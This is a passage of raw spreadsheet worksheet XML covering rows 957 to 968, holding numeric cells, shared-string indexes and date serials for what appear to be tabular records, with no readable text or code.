        <v>0</v>
      </c>
      <c r="AB957">
        <v>100000</v>
      </c>
      <c r="AC957">
        <v>0</v>
      </c>
      <c r="AD957">
        <v>0</v>
      </c>
      <c r="AE957">
        <v>50000</v>
      </c>
      <c r="AF957" t="s">
        <v>7332</v>
      </c>
      <c r="AG957">
        <v>14440</v>
      </c>
      <c r="AH957">
        <v>12</v>
      </c>
      <c r="AJ957">
        <v>160</v>
      </c>
      <c r="AK957" t="s">
        <v>114</v>
      </c>
      <c r="AL957" t="s">
        <v>114</v>
      </c>
      <c r="AM957" t="s">
        <v>7333</v>
      </c>
      <c r="AN957" t="s">
        <v>68</v>
      </c>
      <c r="AO957">
        <v>2014</v>
      </c>
      <c r="AP957">
        <v>81311650819</v>
      </c>
      <c r="AQ957" t="s">
        <v>7334</v>
      </c>
      <c r="AR957" t="s">
        <v>7332</v>
      </c>
      <c r="AS957" t="s">
        <v>179</v>
      </c>
      <c r="AT957" t="s">
        <v>72</v>
      </c>
      <c r="AU957">
        <v>26</v>
      </c>
      <c r="AV957">
        <v>1</v>
      </c>
      <c r="AW957">
        <v>10</v>
      </c>
      <c r="AX957">
        <v>0</v>
      </c>
      <c r="AY957">
        <v>22</v>
      </c>
      <c r="AZ957">
        <v>4</v>
      </c>
      <c r="BA957" t="s">
        <v>17436</v>
      </c>
      <c r="BB957">
        <v>0</v>
      </c>
      <c r="BC957" t="s">
        <v>11556</v>
      </c>
      <c r="BD957">
        <v>0</v>
      </c>
    </row>
    <row r="958" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A958">
        <v>4799</v>
      </c>
      <c r="B958" t="s">
        <v>7335</v>
      </c>
      <c r="C958" t="s">
        <v>129</v>
      </c>
      <c r="D958" t="s">
        <v>7336</v>
      </c>
      <c r="E958" t="s">
        <v>142</v>
      </c>
      <c r="F958" t="s">
        <v>666</v>
      </c>
      <c r="G958" s="1">
        <v>44081</v>
      </c>
      <c r="H958">
        <v>5198</v>
      </c>
      <c r="I958">
        <v>5198</v>
      </c>
      <c r="J958">
        <v>1</v>
      </c>
      <c r="K958">
        <v>0</v>
      </c>
      <c r="L958">
        <v>0</v>
      </c>
      <c r="M958">
        <v>0</v>
      </c>
      <c r="N958">
        <v>0</v>
      </c>
      <c r="O958">
        <v>0</v>
      </c>
      <c r="P958">
        <v>0</v>
      </c>
      <c r="Q958">
        <v>0</v>
      </c>
      <c r="R958">
        <v>0</v>
      </c>
      <c r="S958">
        <v>0</v>
      </c>
      <c r="T958">
        <v>0</v>
      </c>
      <c r="U958">
        <v>400000</v>
      </c>
      <c r="V958">
        <v>0</v>
      </c>
      <c r="W958">
        <v>0</v>
      </c>
      <c r="X958">
        <v>0</v>
      </c>
      <c r="Y958">
        <v>0</v>
      </c>
      <c r="Z958">
        <v>0</v>
      </c>
      <c r="AA958">
        <v>0</v>
      </c>
      <c r="AB958">
        <v>0</v>
      </c>
      <c r="AC958">
        <v>0</v>
      </c>
      <c r="AD958">
        <v>0</v>
      </c>
      <c r="AE958">
        <v>0</v>
      </c>
      <c r="AF958" t="s">
        <v>7335</v>
      </c>
      <c r="AG958">
        <v>15124</v>
      </c>
      <c r="AH958">
        <v>11</v>
      </c>
      <c r="AJ958">
        <v>270</v>
      </c>
      <c r="AK958" t="s">
        <v>1048</v>
      </c>
      <c r="AL958" t="s">
        <v>7337</v>
      </c>
      <c r="AM958" t="s">
        <v>7338</v>
      </c>
      <c r="AN958" t="s">
        <v>68</v>
      </c>
      <c r="AO958">
        <v>1992</v>
      </c>
      <c r="AP958" t="s">
        <v>7339</v>
      </c>
      <c r="AQ958" t="s">
        <v>7340</v>
      </c>
      <c r="AR958" t="s">
        <v>7341</v>
      </c>
      <c r="AS958" t="s">
        <v>179</v>
      </c>
      <c r="AT958" t="s">
        <v>72</v>
      </c>
      <c r="AU958">
        <v>4</v>
      </c>
      <c r="AV958">
        <v>2</v>
      </c>
      <c r="AW958">
        <v>12</v>
      </c>
      <c r="AX958">
        <v>0</v>
      </c>
      <c r="AY958">
        <v>5</v>
      </c>
      <c r="AZ958">
        <v>3</v>
      </c>
      <c r="BA958" t="s">
        <v>17414</v>
      </c>
      <c r="BB958" t="s">
        <v>16048</v>
      </c>
      <c r="BC958" t="s">
        <v>9436</v>
      </c>
      <c r="BD958">
        <v>0</v>
      </c>
    </row>
    <row r="959" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A959">
        <v>4774</v>
      </c>
      <c r="B959" t="s">
        <v>7012</v>
      </c>
      <c r="C959" t="s">
        <v>157</v>
      </c>
      <c r="D959" t="s">
        <v>7342</v>
      </c>
      <c r="E959" t="s">
        <v>76</v>
      </c>
      <c r="F959" t="s">
        <v>7343</v>
      </c>
      <c r="G959" s="1">
        <v>44105</v>
      </c>
      <c r="H959">
        <v>5263</v>
      </c>
      <c r="I959">
        <v>5263</v>
      </c>
      <c r="J959">
        <v>1</v>
      </c>
      <c r="K959">
        <v>1</v>
      </c>
      <c r="L959">
        <v>0</v>
      </c>
      <c r="M959">
        <v>8</v>
      </c>
      <c r="N959">
        <v>0</v>
      </c>
      <c r="O959">
        <v>0</v>
      </c>
      <c r="P959">
        <v>9</v>
      </c>
      <c r="Q959">
        <v>30</v>
      </c>
      <c r="R959">
        <v>200</v>
      </c>
      <c r="S959">
        <v>0</v>
      </c>
      <c r="T959">
        <v>1</v>
      </c>
      <c r="U959">
        <v>500000</v>
      </c>
      <c r="V959">
        <v>1</v>
      </c>
      <c r="W959">
        <v>0</v>
      </c>
      <c r="X959">
        <v>4000</v>
      </c>
      <c r="Y959">
        <v>0</v>
      </c>
      <c r="Z959">
        <v>0</v>
      </c>
      <c r="AA959">
        <v>4500</v>
      </c>
      <c r="AB959">
        <v>2000</v>
      </c>
      <c r="AC959">
        <v>100000</v>
      </c>
      <c r="AD959">
        <v>0</v>
      </c>
      <c r="AE959">
        <v>150000</v>
      </c>
      <c r="AF959" t="s">
        <v>4664</v>
      </c>
      <c r="AG959">
        <v>60186</v>
      </c>
      <c r="AH959">
        <v>16</v>
      </c>
      <c r="AJ959">
        <v>264</v>
      </c>
      <c r="AK959" t="s">
        <v>2543</v>
      </c>
      <c r="AL959" t="s">
        <v>2543</v>
      </c>
      <c r="AM959" t="s">
        <v>7344</v>
      </c>
      <c r="AN959" t="s">
        <v>55</v>
      </c>
      <c r="AO959">
        <v>2000</v>
      </c>
      <c r="AP959">
        <v>317491000</v>
      </c>
      <c r="AQ959" t="s">
        <v>7345</v>
      </c>
      <c r="AR959" t="s">
        <v>7346</v>
      </c>
      <c r="AS959" t="s">
        <v>71</v>
      </c>
      <c r="AT959" t="s">
        <v>58</v>
      </c>
      <c r="AU959">
        <v>7</v>
      </c>
      <c r="AV959">
        <v>1</v>
      </c>
      <c r="AW959">
        <v>100</v>
      </c>
      <c r="AX959">
        <v>250</v>
      </c>
      <c r="AY959">
        <v>25</v>
      </c>
      <c r="AZ959">
        <v>25</v>
      </c>
      <c r="BA959" t="s">
        <v>16653</v>
      </c>
      <c r="BB959" t="s">
        <v>14442</v>
      </c>
      <c r="BC959">
        <v>0</v>
      </c>
      <c r="BD959" t="s">
        <v>11600</v>
      </c>
    </row>
    <row r="960" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A960">
        <v>4853</v>
      </c>
      <c r="B960" t="s">
        <v>7347</v>
      </c>
      <c r="C960" t="s">
        <v>99</v>
      </c>
      <c r="D960" t="s">
        <v>7348</v>
      </c>
      <c r="E960" t="s">
        <v>142</v>
      </c>
      <c r="F960" t="s">
        <v>1420</v>
      </c>
      <c r="G960" s="1">
        <v>44097</v>
      </c>
      <c r="H960">
        <v>5283</v>
      </c>
      <c r="I960">
        <v>5283</v>
      </c>
      <c r="J960">
        <v>1</v>
      </c>
      <c r="K960">
        <v>0</v>
      </c>
      <c r="L960">
        <v>1</v>
      </c>
      <c r="M960">
        <v>0</v>
      </c>
      <c r="N960">
        <v>0</v>
      </c>
      <c r="O960">
        <v>0</v>
      </c>
      <c r="P960">
        <v>0</v>
      </c>
      <c r="Q960">
        <v>0</v>
      </c>
      <c r="R960">
        <v>0</v>
      </c>
      <c r="S960">
        <v>0</v>
      </c>
      <c r="T960">
        <v>0</v>
      </c>
      <c r="U960">
        <v>300000</v>
      </c>
      <c r="V960">
        <v>0</v>
      </c>
      <c r="W960">
        <v>50000</v>
      </c>
      <c r="X960">
        <v>0</v>
      </c>
      <c r="Y960">
        <v>0</v>
      </c>
      <c r="Z960">
        <v>0</v>
      </c>
      <c r="AA960">
        <v>0</v>
      </c>
      <c r="AB960">
        <v>0</v>
      </c>
      <c r="AC960">
        <v>0</v>
      </c>
      <c r="AD960">
        <v>0</v>
      </c>
      <c r="AE960">
        <v>0</v>
      </c>
      <c r="AF960" t="s">
        <v>7349</v>
      </c>
      <c r="AG960">
        <v>14440</v>
      </c>
      <c r="AH960">
        <v>12</v>
      </c>
      <c r="AJ960">
        <v>160</v>
      </c>
      <c r="AK960" t="s">
        <v>114</v>
      </c>
      <c r="AL960" t="s">
        <v>114</v>
      </c>
      <c r="AM960" t="s">
        <v>7350</v>
      </c>
      <c r="AN960" t="s">
        <v>55</v>
      </c>
      <c r="AO960">
        <v>2018</v>
      </c>
      <c r="AP960">
        <v>85394162480</v>
      </c>
      <c r="AQ960" t="s">
        <v>7351</v>
      </c>
      <c r="AR960" t="s">
        <v>7351</v>
      </c>
      <c r="AS960" t="s">
        <v>187</v>
      </c>
      <c r="AT960" t="s">
        <v>58</v>
      </c>
      <c r="AU960">
        <v>24</v>
      </c>
      <c r="AV960">
        <v>0</v>
      </c>
      <c r="AW960">
        <v>0</v>
      </c>
      <c r="AX960">
        <v>0</v>
      </c>
      <c r="AY960">
        <v>17</v>
      </c>
      <c r="AZ960">
        <v>6</v>
      </c>
      <c r="BA960" t="s">
        <v>17448</v>
      </c>
      <c r="BB960">
        <v>0</v>
      </c>
      <c r="BC960" t="s">
        <v>9550</v>
      </c>
      <c r="BD960">
        <v>0</v>
      </c>
    </row>
    <row r="961" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A961">
        <v>4840</v>
      </c>
      <c r="B961" t="s">
        <v>7352</v>
      </c>
      <c r="C961" t="s">
        <v>157</v>
      </c>
      <c r="D961" t="s">
        <v>7353</v>
      </c>
      <c r="E961" t="s">
        <v>7354</v>
      </c>
      <c r="F961" t="s">
        <v>7355</v>
      </c>
      <c r="G961" s="1">
        <v>44344</v>
      </c>
      <c r="H961">
        <v>5317</v>
      </c>
      <c r="I961">
        <v>5317</v>
      </c>
      <c r="J961">
        <v>4</v>
      </c>
      <c r="K961">
        <v>1</v>
      </c>
      <c r="L961">
        <v>0</v>
      </c>
      <c r="M961">
        <v>0</v>
      </c>
      <c r="N961">
        <v>0</v>
      </c>
      <c r="O961">
        <v>0</v>
      </c>
      <c r="P961">
        <v>0</v>
      </c>
      <c r="Q961">
        <v>30</v>
      </c>
      <c r="R961">
        <v>2</v>
      </c>
      <c r="S961">
        <v>0</v>
      </c>
      <c r="T961">
        <v>1</v>
      </c>
      <c r="U961">
        <v>2000</v>
      </c>
      <c r="V961">
        <v>2000</v>
      </c>
      <c r="W961">
        <v>0</v>
      </c>
      <c r="X961">
        <v>0</v>
      </c>
      <c r="Y961">
        <v>0</v>
      </c>
      <c r="Z961">
        <v>0</v>
      </c>
      <c r="AA961">
        <v>0</v>
      </c>
      <c r="AB961">
        <v>1000</v>
      </c>
      <c r="AC961">
        <v>2000</v>
      </c>
      <c r="AD961">
        <v>0</v>
      </c>
      <c r="AE961">
        <v>1000</v>
      </c>
      <c r="AF961" t="s">
        <v>7356</v>
      </c>
      <c r="AG961">
        <v>61151</v>
      </c>
      <c r="AH961">
        <v>16</v>
      </c>
      <c r="AJ961">
        <v>252</v>
      </c>
      <c r="AK961" t="s">
        <v>6843</v>
      </c>
      <c r="AL961" t="s">
        <v>7357</v>
      </c>
      <c r="AM961" t="s">
        <v>7358</v>
      </c>
      <c r="AN961" t="s">
        <v>68</v>
      </c>
      <c r="AO961">
        <v>2012</v>
      </c>
      <c r="AP961">
        <v>8561739091</v>
      </c>
      <c r="AQ961" t="s">
        <v>7359</v>
      </c>
      <c r="AR961" t="s">
        <v>7356</v>
      </c>
      <c r="AS961" t="s">
        <v>71</v>
      </c>
      <c r="AT961" t="s">
        <v>72</v>
      </c>
      <c r="AU961">
        <v>24</v>
      </c>
      <c r="AV961">
        <v>1</v>
      </c>
      <c r="AW961">
        <v>2</v>
      </c>
      <c r="AX961">
        <v>8</v>
      </c>
      <c r="AY961">
        <v>3</v>
      </c>
      <c r="AZ961">
        <v>24</v>
      </c>
      <c r="BA961" t="s">
        <v>17437</v>
      </c>
      <c r="BB961">
        <v>0</v>
      </c>
      <c r="BC961" t="s">
        <v>11626</v>
      </c>
      <c r="BD961">
        <v>0</v>
      </c>
    </row>
    <row r="962" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A962">
        <v>4863</v>
      </c>
      <c r="B962" t="s">
        <v>7360</v>
      </c>
      <c r="C962" t="s">
        <v>4653</v>
      </c>
      <c r="D962" t="s">
        <v>7361</v>
      </c>
      <c r="E962" t="s">
        <v>363</v>
      </c>
      <c r="F962" t="s">
        <v>7057</v>
      </c>
      <c r="G962" s="1">
        <v>44126</v>
      </c>
      <c r="H962">
        <v>5377</v>
      </c>
      <c r="I962">
        <v>5377</v>
      </c>
      <c r="J962">
        <v>0</v>
      </c>
      <c r="K962">
        <v>0</v>
      </c>
      <c r="L962">
        <v>0</v>
      </c>
      <c r="M962">
        <v>0</v>
      </c>
      <c r="N962">
        <v>0</v>
      </c>
      <c r="O962">
        <v>0</v>
      </c>
      <c r="P962">
        <v>0</v>
      </c>
      <c r="Q962">
        <v>0</v>
      </c>
      <c r="R962">
        <v>0</v>
      </c>
      <c r="S962">
        <v>0</v>
      </c>
      <c r="T962">
        <v>1</v>
      </c>
      <c r="U962">
        <v>0</v>
      </c>
      <c r="V962">
        <v>0</v>
      </c>
      <c r="W962">
        <v>0</v>
      </c>
      <c r="X962">
        <v>0</v>
      </c>
      <c r="Y962">
        <v>0</v>
      </c>
      <c r="Z962">
        <v>0</v>
      </c>
      <c r="AA962">
        <v>0</v>
      </c>
      <c r="AB962">
        <v>0</v>
      </c>
      <c r="AC962">
        <v>0</v>
      </c>
      <c r="AD962">
        <v>0</v>
      </c>
      <c r="AE962">
        <v>5000</v>
      </c>
      <c r="AF962" t="s">
        <v>7362</v>
      </c>
      <c r="AG962">
        <v>0</v>
      </c>
      <c r="AH962">
        <v>7</v>
      </c>
      <c r="AJ962">
        <v>94</v>
      </c>
      <c r="AK962" t="s">
        <v>7363</v>
      </c>
      <c r="AL962" t="s">
        <v>7364</v>
      </c>
      <c r="AM962" t="s">
        <v>7365</v>
      </c>
      <c r="AN962" t="s">
        <v>55</v>
      </c>
      <c r="AO962">
        <v>1986</v>
      </c>
      <c r="AP962">
        <v>61216122237</v>
      </c>
      <c r="AQ962" t="s">
        <v>7366</v>
      </c>
      <c r="AR962" t="s">
        <v>7367</v>
      </c>
      <c r="AS962" t="s">
        <v>371</v>
      </c>
      <c r="AT962" t="s">
        <v>58</v>
      </c>
      <c r="AU962">
        <v>30</v>
      </c>
      <c r="AV962">
        <v>1</v>
      </c>
      <c r="AW962">
        <v>0</v>
      </c>
      <c r="AX962">
        <v>30</v>
      </c>
      <c r="AY962">
        <v>3</v>
      </c>
      <c r="AZ962">
        <v>0</v>
      </c>
      <c r="BA962" t="s">
        <v>17391</v>
      </c>
      <c r="BB962" t="s">
        <v>16027</v>
      </c>
      <c r="BC962" t="s">
        <v>9550</v>
      </c>
      <c r="BD962" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="963" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A963">
        <v>4801</v>
      </c>
      <c r="B963" t="s">
        <v>7368</v>
      </c>
      <c r="C963" t="s">
        <v>47</v>
      </c>
      <c r="D963" t="s">
        <v>7369</v>
      </c>
      <c r="E963" t="s">
        <v>142</v>
      </c>
      <c r="F963" t="s">
        <v>7370</v>
      </c>
      <c r="G963" s="1">
        <v>44183</v>
      </c>
      <c r="H963">
        <v>5396</v>
      </c>
      <c r="I963">
        <v>5396</v>
      </c>
      <c r="J963">
        <v>1</v>
      </c>
      <c r="K963">
        <v>0</v>
      </c>
      <c r="L963">
        <v>0</v>
      </c>
      <c r="M963">
        <v>0</v>
      </c>
      <c r="N963">
        <v>0</v>
      </c>
      <c r="O963">
        <v>0</v>
      </c>
      <c r="P963">
        <v>0</v>
      </c>
      <c r="Q963">
        <v>4</v>
      </c>
      <c r="R963">
        <v>10</v>
      </c>
      <c r="S963">
        <v>0</v>
      </c>
      <c r="T963">
        <v>3</v>
      </c>
      <c r="U963">
        <v>250000</v>
      </c>
      <c r="V963">
        <v>0</v>
      </c>
      <c r="W963">
        <v>0</v>
      </c>
      <c r="X963">
        <v>0</v>
      </c>
      <c r="Y963">
        <v>0</v>
      </c>
      <c r="Z963">
        <v>0</v>
      </c>
      <c r="AA963">
        <v>0</v>
      </c>
      <c r="AB963">
        <v>500</v>
      </c>
      <c r="AC963">
        <v>500</v>
      </c>
      <c r="AD963">
        <v>0</v>
      </c>
      <c r="AE963">
        <v>300000</v>
      </c>
      <c r="AF963" t="s">
        <v>7371</v>
      </c>
      <c r="AG963">
        <v>20256</v>
      </c>
      <c r="AH963">
        <v>2</v>
      </c>
      <c r="AJ963">
        <v>53</v>
      </c>
      <c r="AK963" t="s">
        <v>3055</v>
      </c>
      <c r="AL963" t="s">
        <v>7372</v>
      </c>
      <c r="AM963" t="s">
        <v>7373</v>
      </c>
      <c r="AN963" t="s">
        <v>55</v>
      </c>
      <c r="AO963">
        <v>2010</v>
      </c>
      <c r="AP963" t="s">
        <v>7374</v>
      </c>
      <c r="AQ963" t="s">
        <v>7375</v>
      </c>
      <c r="AR963" t="s">
        <v>7376</v>
      </c>
      <c r="AS963" t="s">
        <v>71</v>
      </c>
      <c r="AT963" t="s">
        <v>58</v>
      </c>
      <c r="AU963">
        <v>24</v>
      </c>
      <c r="AV963">
        <v>0</v>
      </c>
      <c r="AW963">
        <v>20</v>
      </c>
      <c r="AX963">
        <v>40</v>
      </c>
      <c r="AY963">
        <v>6</v>
      </c>
      <c r="AZ963">
        <v>4</v>
      </c>
      <c r="BA963" t="s">
        <v>17379</v>
      </c>
      <c r="BB963" t="s">
        <v>16031</v>
      </c>
      <c r="BC963">
        <v>0</v>
      </c>
      <c r="BD963" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="964" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A964">
        <v>4790</v>
      </c>
      <c r="B964" t="s">
        <v>5016</v>
      </c>
      <c r="C964" t="s">
        <v>189</v>
      </c>
      <c r="D964" t="s">
        <v>7377</v>
      </c>
      <c r="E964" t="s">
        <v>142</v>
      </c>
      <c r="F964" t="s">
        <v>7378</v>
      </c>
      <c r="G964" s="1">
        <v>44293</v>
      </c>
      <c r="H964">
        <v>5400</v>
      </c>
      <c r="I964">
        <v>5400</v>
      </c>
      <c r="J964">
        <v>4</v>
      </c>
      <c r="K964">
        <v>0</v>
      </c>
      <c r="L964">
        <v>8</v>
      </c>
      <c r="M964">
        <v>0</v>
      </c>
      <c r="N964">
        <v>0</v>
      </c>
      <c r="O964">
        <v>0</v>
      </c>
      <c r="P964">
        <v>0</v>
      </c>
      <c r="Q964">
        <v>0</v>
      </c>
      <c r="R964">
        <v>0</v>
      </c>
      <c r="S964">
        <v>0</v>
      </c>
      <c r="T964">
        <v>0</v>
      </c>
      <c r="U964">
        <v>400000</v>
      </c>
      <c r="V964">
        <v>0</v>
      </c>
      <c r="W964">
        <v>64000</v>
      </c>
      <c r="X964">
        <v>0</v>
      </c>
      <c r="Y964">
        <v>0</v>
      </c>
      <c r="Z964">
        <v>0</v>
      </c>
      <c r="AA964">
        <v>0</v>
      </c>
      <c r="AB964">
        <v>0</v>
      </c>
      <c r="AC964">
        <v>0</v>
      </c>
      <c r="AD964">
        <v>0</v>
      </c>
      <c r="AE964">
        <v>0</v>
      </c>
      <c r="AF964" t="s">
        <v>7379</v>
      </c>
      <c r="AG964">
        <v>0</v>
      </c>
      <c r="AH964">
        <v>31</v>
      </c>
      <c r="AJ964">
        <v>456</v>
      </c>
      <c r="AK964" t="s">
        <v>7380</v>
      </c>
      <c r="AL964" t="s">
        <v>7381</v>
      </c>
      <c r="AM964" t="s">
        <v>7382</v>
      </c>
      <c r="AN964" t="s">
        <v>55</v>
      </c>
      <c r="AO964">
        <v>2008</v>
      </c>
      <c r="AP964" t="s">
        <v>7383</v>
      </c>
      <c r="AQ964" t="s">
        <v>7384</v>
      </c>
      <c r="AR964" t="s">
        <v>7385</v>
      </c>
      <c r="AS964" t="s">
        <v>71</v>
      </c>
      <c r="AT964" t="s">
        <v>58</v>
      </c>
      <c r="AU964">
        <v>25</v>
      </c>
      <c r="AV964">
        <v>1</v>
      </c>
      <c r="AW964">
        <v>92</v>
      </c>
      <c r="AX964">
        <v>42</v>
      </c>
      <c r="AY964">
        <v>36</v>
      </c>
      <c r="AZ964">
        <v>16</v>
      </c>
      <c r="BA964" t="s">
        <v>16613</v>
      </c>
      <c r="BB964" t="s">
        <v>14922</v>
      </c>
      <c r="BC964" t="s">
        <v>9485</v>
      </c>
      <c r="BD964">
        <v>0</v>
      </c>
    </row>
    <row r="965" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A965">
        <v>4830</v>
      </c>
      <c r="B965" t="s">
        <v>7386</v>
      </c>
      <c r="C965" t="s">
        <v>129</v>
      </c>
      <c r="D965" t="s">
        <v>7387</v>
      </c>
      <c r="E965" t="s">
        <v>131</v>
      </c>
      <c r="F965" t="s">
        <v>3242</v>
      </c>
      <c r="G965" s="1">
        <v>44099</v>
      </c>
      <c r="H965">
        <v>5407</v>
      </c>
      <c r="I965">
        <v>5407</v>
      </c>
      <c r="J965">
        <v>0</v>
      </c>
      <c r="K965">
        <v>1</v>
      </c>
      <c r="L965">
        <v>0</v>
      </c>
      <c r="M965">
        <v>0</v>
      </c>
      <c r="N965">
        <v>0</v>
      </c>
      <c r="O965">
        <v>0</v>
      </c>
      <c r="P965">
        <v>0</v>
      </c>
      <c r="Q965">
        <v>1</v>
      </c>
      <c r="R965">
        <v>0</v>
      </c>
      <c r="S965">
        <v>0</v>
      </c>
      <c r="T965">
        <v>1</v>
      </c>
      <c r="U965">
        <v>0</v>
      </c>
      <c r="V965">
        <v>10000</v>
      </c>
      <c r="W965">
        <v>0</v>
      </c>
      <c r="X965">
        <v>0</v>
      </c>
      <c r="Y965">
        <v>0</v>
      </c>
      <c r="Z965">
        <v>0</v>
      </c>
      <c r="AA965">
        <v>0</v>
      </c>
      <c r="AB965">
        <v>10</v>
      </c>
      <c r="AC965">
        <v>0</v>
      </c>
      <c r="AD965">
        <v>0</v>
      </c>
      <c r="AE965">
        <v>100000</v>
      </c>
      <c r="AF965" t="s">
        <v>7388</v>
      </c>
      <c r="AG965">
        <v>15314</v>
      </c>
      <c r="AH965">
        <v>11</v>
      </c>
      <c r="AJ965">
        <v>273</v>
      </c>
      <c r="AK965" t="s">
        <v>3443</v>
      </c>
      <c r="AL965" t="s">
        <v>3443</v>
      </c>
      <c r="AM965" t="s">
        <v>7389</v>
      </c>
      <c r="AN965" t="s">
        <v>55</v>
      </c>
      <c r="AO965">
        <v>1997</v>
      </c>
      <c r="AP965" t="s">
        <v>7390</v>
      </c>
      <c r="AQ965" t="s">
        <v>7391</v>
      </c>
      <c r="AR965" t="s">
        <v>7392</v>
      </c>
      <c r="AS965" t="s">
        <v>553</v>
      </c>
      <c r="AT965" t="s">
        <v>58</v>
      </c>
      <c r="AU965">
        <v>0</v>
      </c>
      <c r="AV965">
        <v>0</v>
      </c>
      <c r="AW965">
        <v>0</v>
      </c>
      <c r="AX965">
        <v>0</v>
      </c>
      <c r="AY965">
        <v>28</v>
      </c>
      <c r="AZ965">
        <v>19</v>
      </c>
      <c r="BA965" t="s">
        <v>17433</v>
      </c>
      <c r="BB965" t="s">
        <v>16049</v>
      </c>
      <c r="BC965" t="s">
        <v>11778</v>
      </c>
      <c r="BD965">
        <v>0</v>
      </c>
    </row>
    <row r="966" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A966">
        <v>4889</v>
      </c>
      <c r="B966" t="s">
        <v>7393</v>
      </c>
      <c r="C966" t="s">
        <v>3165</v>
      </c>
      <c r="D966" t="s">
        <v>7394</v>
      </c>
      <c r="E966" t="s">
        <v>142</v>
      </c>
      <c r="F966" t="s">
        <v>7395</v>
      </c>
      <c r="G966" s="1">
        <v>44155</v>
      </c>
      <c r="H966">
        <v>5430</v>
      </c>
      <c r="I966">
        <v>5430</v>
      </c>
      <c r="J966">
        <v>1</v>
      </c>
      <c r="K966">
        <v>0</v>
      </c>
      <c r="L966">
        <v>2</v>
      </c>
      <c r="M966">
        <v>0</v>
      </c>
      <c r="N966">
        <v>0</v>
      </c>
      <c r="O966">
        <v>0</v>
      </c>
      <c r="P966">
        <v>0</v>
      </c>
      <c r="Q966">
        <v>0</v>
      </c>
      <c r="R966">
        <v>0</v>
      </c>
      <c r="S966">
        <v>0</v>
      </c>
      <c r="T966">
        <v>0</v>
      </c>
      <c r="U966">
        <v>250000</v>
      </c>
      <c r="V966">
        <v>0</v>
      </c>
      <c r="W966">
        <v>6000</v>
      </c>
      <c r="X966">
        <v>0</v>
      </c>
      <c r="Y966">
        <v>0</v>
      </c>
      <c r="Z966">
        <v>0</v>
      </c>
      <c r="AA966">
        <v>0</v>
      </c>
      <c r="AB966">
        <v>0</v>
      </c>
      <c r="AC966">
        <v>0</v>
      </c>
      <c r="AD966">
        <v>0</v>
      </c>
      <c r="AE966">
        <v>0</v>
      </c>
      <c r="AF966" t="s">
        <v>7396</v>
      </c>
      <c r="AG966">
        <v>99600</v>
      </c>
      <c r="AH966">
        <v>34</v>
      </c>
      <c r="AJ966">
        <v>486</v>
      </c>
      <c r="AK966" t="s">
        <v>3169</v>
      </c>
      <c r="AL966" t="s">
        <v>7397</v>
      </c>
      <c r="AM966" t="s">
        <v>7398</v>
      </c>
      <c r="AN966" t="s">
        <v>68</v>
      </c>
      <c r="AO966">
        <v>2019</v>
      </c>
      <c r="AP966">
        <v>6285254414184</v>
      </c>
      <c r="AQ966" t="s">
        <v>7399</v>
      </c>
      <c r="AR966" t="s">
        <v>7396</v>
      </c>
      <c r="AS966" t="s">
        <v>71</v>
      </c>
      <c r="AT966" t="s">
        <v>72</v>
      </c>
      <c r="AU966">
        <v>24</v>
      </c>
      <c r="AV966">
        <v>0</v>
      </c>
      <c r="AW966">
        <v>10</v>
      </c>
      <c r="AX966">
        <v>0</v>
      </c>
      <c r="AY966">
        <v>2</v>
      </c>
      <c r="AZ966">
        <v>4</v>
      </c>
      <c r="BA966" t="s">
        <v>17351</v>
      </c>
      <c r="BB966">
        <v>0</v>
      </c>
      <c r="BC966" t="s">
        <v>9550</v>
      </c>
      <c r="BD966">
        <v>0</v>
      </c>
    </row>
    <row r="967" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A967">
        <v>4862</v>
      </c>
      <c r="B967" t="s">
        <v>7400</v>
      </c>
      <c r="C967" t="s">
        <v>47</v>
      </c>
      <c r="D967" t="s">
        <v>7401</v>
      </c>
      <c r="E967" t="s">
        <v>7402</v>
      </c>
      <c r="F967" t="s">
        <v>7403</v>
      </c>
      <c r="G967" s="1">
        <v>44145</v>
      </c>
      <c r="H967">
        <v>5441</v>
      </c>
      <c r="I967">
        <v>5441</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t="s">
        <v>6045</v>
      </c>
      <c r="AG967">
        <v>21352</v>
      </c>
      <c r="AH967">
        <v>2</v>
      </c>
      <c r="AJ967">
        <v>31</v>
      </c>
      <c r="AK967" t="s">
        <v>7404</v>
      </c>
      <c r="AL967" t="s">
        <v>7405</v>
      </c>
      <c r="AM967" t="s">
        <v>7406</v>
      </c>
      <c r="AN967" t="s">
        <v>55</v>
      </c>
      <c r="AO967">
        <v>2020</v>
      </c>
      <c r="AP967">
        <v>81260827799</v>
      </c>
      <c r="AQ967" t="s">
        <v>7407</v>
      </c>
      <c r="AR967" t="s">
        <v>6045</v>
      </c>
      <c r="AS967" t="s">
        <v>71</v>
      </c>
      <c r="AT967" t="s">
        <v>58</v>
      </c>
      <c r="AU967">
        <v>36</v>
      </c>
      <c r="AV967">
        <v>2</v>
      </c>
      <c r="AW967">
        <v>4</v>
      </c>
      <c r="AX967">
        <v>2</v>
      </c>
      <c r="AY967">
        <v>11</v>
      </c>
      <c r="AZ967">
        <v>2</v>
      </c>
      <c r="BA967" t="s">
        <v>16747</v>
      </c>
      <c r="BB967">
        <v>0</v>
      </c>
      <c r="BC967">
        <v>0</v>
      </c>
      <c r="BD967" t="s">
        <v>12104</v>
      </c>
    </row>
    <row r="968" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A968">
        <v>4876</v>
      </c>
      <c r="B968" t="s">
        <v>7408</v>
      </c>
      <c r="C968" t="s">
        <v>157</v>
      </c>
      <c r="D968" t="s">
        <v>7409</v>
      </c>
      <c r="E968" t="s">
        <v>142</v>
      </c>
      <c r="F968" t="s">
        <v>7410</v>
      </c>
      <c r="G968" s="1">
        <v>44116</v>
      </c>
      <c r="H968">
        <v>5442</v>
      </c>
      <c r="I968">
        <v>5442</v>
      </c>
      <c r="J968">
        <v>1</v>
      </c>
      <c r="K968">
        <v>0</v>
      </c>
      <c r="L968">
        <v>0</v>
      </c>
      <c r="M968">
        <v>0</v>
      </c>
      <c r="N968">
        <v>0</v>
      </c>
      <c r="O968">
        <v>0</v>
      </c>
      <c r="P968">
        <v>0</v>
      </c>
      <c r="Q968">
        <v>0</v>
      </c>
      <c r="R968">
        <v>2</v>
      </c>
